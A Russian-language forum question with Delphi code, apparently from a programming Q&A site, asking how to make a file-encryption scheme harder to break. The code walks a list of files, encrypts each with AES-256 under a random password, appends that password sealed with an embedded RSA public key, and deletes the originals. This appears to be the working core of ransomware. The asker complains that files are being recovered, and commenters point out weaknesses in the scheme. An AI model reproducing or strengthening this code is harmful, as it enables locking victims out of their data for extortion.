# Delphi. криптостойкость шифрования

Tags: delphi, шифрование, aes

Использую компонент LockBox.
Шифрую файлы используя ниженаписанный код.
Проблема - мои файлы расшифровывают.

Мои знания в области в структуры файла и непосредственно в самом шифровании очень и очень базовые. Знаю что есть соль, вектор инициализации, заполнение, но не знаю что это такое и как этим пользоваться. Помогите переписать код, для повышения криптостойкойсти крипта.

```
uses
  uTPLb_Codec,
  uTPLb_CryptographicLibrary,
  uTPLb_CBC,
  uTPLb_BlockCipher,
  uTPLb_Constants;

function AES (input, output, Password: string): Boolean;
var
codec:uTPLb_Codec.TCodec;
CryptographicLibrary:uTPLb_CryptographicLibrary.TCryptographicLibrary;
begin
Codec := TCodec.Create(nil);
Codec.CryptoLibrary:= TCryptographicLibrary.Create(Codec);
Codec.StreamCipherId := BlockCipher_ProgID;
Codec.BlockCipherId := Format(AES_ProgId, [256]);
Codec.ChainModeId := CBC_ProgId;
codec.Password:=Password;
codec.EncryptFile(input,output);
codec.Burn;
codec.Free;
end;
```

---

```
function RandomPassword(PLen: Integer): string;
 var
  str: string;
 begin
  Randomize;
 str :=
        'QWERTYUIOPASDFGHJKLZXCVBNM'+
        'qwertyuiopasdfghjklzxcvbnm'+
        '1234567890'+
        '~!@#$%^&*()-=+{}:"<>?/\.,';
  Result := '';
  repeat
  Result := Result + str[Random(Length(str)) + 1];
  until (Length(Result) = PLen)
 end;


 // шифрование
 for i := 0 to v.Count-1 do
 try
    begin
      if    CheckAccessToFile(GENERIC_WRITE,ExtractFilePath(v[i])) = true then
       begin


           password:=RandomPassword(32);

           AES(v[i], ExtractFilePath(v[i]) + 'файл защищен'+' ('+ExtractFileName(v[i])+')'+' .aes',password);

           AssignFile(myFile, ExtractFilePath(v[i]) + 'файл защищен'+' ('+ExtractFileName(v[i])+')'+' .aes');
           ReSet(myFile);
           Append(myFile);
           WriteLn(myFile,'password:'+ EncryptRSA_String(password,MSPublic));
           CloseFile(myFile);


           deletefile(Pchar(v[i]));



       end;
    end;

 except
 end;
```

Comment: А пароль вы где храните?..

Comment: шифрую с помощью RSA 1024bit и записываю в конец шифруемого файла. думаю это самое рациональное хранение ключа.
У есть мысль, что файлы просто брутфорсят, но как ? я использую 32 символьный пароль, который как я понял подбирать очень и очень долго

Comment: То есть пароль к шифруемому файлу лежит прямо с этим файлом, зашифрованный константным паролем? А сам этот константный пароль фигурирует в теле приложения, которое доступно широкому кругу пользователей?

Comment: я не очень понимаю что значит константный пароль.
пароль рандомится для каждого файла свой и шифруется с помощью RSA и записывается в конец ранее зашифрованного файла AES'ом .

Comment: я дополнил код.

Comment: По вашему коду: пароль дописывается в конец файла, шифруясь ключем из переменной `MSPublic`. А где и как хранится приватная часть RSA-ключа? Кстати, ошибочно считать, что на весь зашифрованный файл ни разу не встретится последовательность CRLF, а ведь именно на нее вы ориентируетесь, считывая пароль обратно.